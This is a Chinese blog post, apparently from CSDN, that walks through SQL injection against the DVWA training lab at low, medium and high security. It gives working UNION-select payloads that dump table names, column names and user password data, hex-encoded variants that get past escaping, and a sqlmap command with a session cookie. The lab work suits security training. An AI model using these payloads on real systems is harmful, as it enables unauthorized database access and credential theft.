DVWA sql注入(低中高)

最新推荐文章于 2024-04-29 20:55:13 发布
最新推荐文章于 2024-04-29 20:55:13 发布
阅读量416 收藏
点赞数 2
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73581247/article/details/130030264
版权

SQL Injection(Security Level: low)

太简单了,只给出代码

查询版本和数据库名

-1' union select database(),version() #

 查询数据表名

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

 查询数据列名

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

查询数据

-1' union select 1,group_concat(user,password) from users #

SQL Injection(Security Level: medium)

这里需要抓包

 

因为这里对一些字符进行了转义,需要使用HEX进行转义

 


id=1 union (select 1,group_concat(table_name) from information_schema.tables where table_schema= 0x64767761)&Submit=Submit

这样我们就能得到和上面初级一样的内容,接下来的和初级类似 


id=-1 union (select 1,group_concat(column_name) from information_schema.columns where table_name= 0x7573657273)&Submit=Submit

 

就不一一演示了

SQL Injection(Security Level: high)

 

这里我感觉和第一关差不多

都说手动注入烦,直接sqlmap一把梭哈

 抓包找cookie

我就不抓了直接给代码

sqlmap.py -u "http://192.168.233.128/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=7v7801ht8q1mm4k3vko6cp43n5; security=low " --batch

 偶然发现sqlmap还有解密功能

 

fann@qiu
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1655
DVWAsql注入漏洞-low
DVWA-SQL注入
WY92139010的博客
05-03 945
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
网络安全-靶机dvwasql注入LowHigh详解(含代码分析)_dvwa sql注入低中代码分析
最新发布
2401_84253132的博客
04-29 812
这样的话估计不能使用Error注入。结论:字段为2。
关于DVWA靶场SQL Injection(low,medium,high)代码分析及注入分析
qq_22792465的博客
06-10 400
下图为源码中提交表单action='#'的作用是将数据提交到当前页面。
DVWA通过攻略之SQL注入
勿山几已
05-24 8322
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
Dvwa练习06 SQL注入Low
coco3105的博客
02-19 1137
等级low分别用了手工和sqlmap注入,medium没实践,high采用的是旧版本,没过滤参数。
dvwa靶场sql注入low
qq_14902381的博客
08-22 399
dvwa 靶场,sql注入low
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA下的SQL注入
07-25
SQL
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
php防止sql注入简单分析
12-19
防止Sql注入的方法有很多,这里要说的其实就是漏洞演练平台Dvwa里的一种方式 直接看high级别的就可以了 $id = $_GET['id']; $id = stripslashes($id); $id = mysql_real_escape_string($id); if (is_numeric($id)){...
学习之sql注入漏洞网址的创建
06-06
学习sql注入,往往需要一个可注入的网址,这篇文章很好的解决了这个问题,我们可以自己创建一个自己用的地址来学习,可以让我们为所欲为。
dvwaSQL盲注
ANDTM的博客
05-30 951
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL盲注和SQL注入的区别就是盲注它不会有完整的回显,这里分为两种,一种是布尔盲注,另一种是时间盲注。
sqlmap测试dvwa-sql注入high
qq_39511050的博客
08-12 1833
sqlmap测试dvwa-sql注入high
DVWA综合靶场练习:SQL injection-低中
流浪法师的博客
05-26 209
DVWA综合靶场练习:SQL injection-低中
DVWA (Dam Vulnerable Web Application)中级SQL注入实战
baidu_33260220的博客
11-07 4677
1、输入’ or 1=1 #  ,发现’被转义成\’    ‘ “  \ 都被转义加\ 2、输入1 or 1=1 #  ,发现有数字型注入  3、输入1 order by 2判断有两个字段,输入1 union select 1,2 #判断两个字段都可以代入参数进行查询     4、输入1 union select user(),datab
DVWASQL注入
heyingcheng的博客
11-16 725
通过把恶意的sql命令插入web表单递交给服务器,或者输入域名或页面请求的查询字符串提交到服务器,达到欺骗服务器,让服务器执行这些恶意的sql命令,从而让攻击者,可以绕过一些机制,达到直接访问数据库的一种攻击手段。
深入理解MySQL安全(四)-DVWA High security SQL注入方法
zhujiu_fu的博客
02-15 153
前面完成了low,miedia level sql的注入的思路和方法,本章继续讲解high level sql注入的思路及方法。
dvwa sql注入
08-27
DVWA 中进行 SQL 注入练习,可以通过以下步骤进行: 1. 安装和配置 DVWA:首先,需要下载 DVWA,并将其部署到本地服务器或虚拟机中。然后,根据提供的说明进行配置,设置安全级别为“低”。 2. 寻找 SQL 注入点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值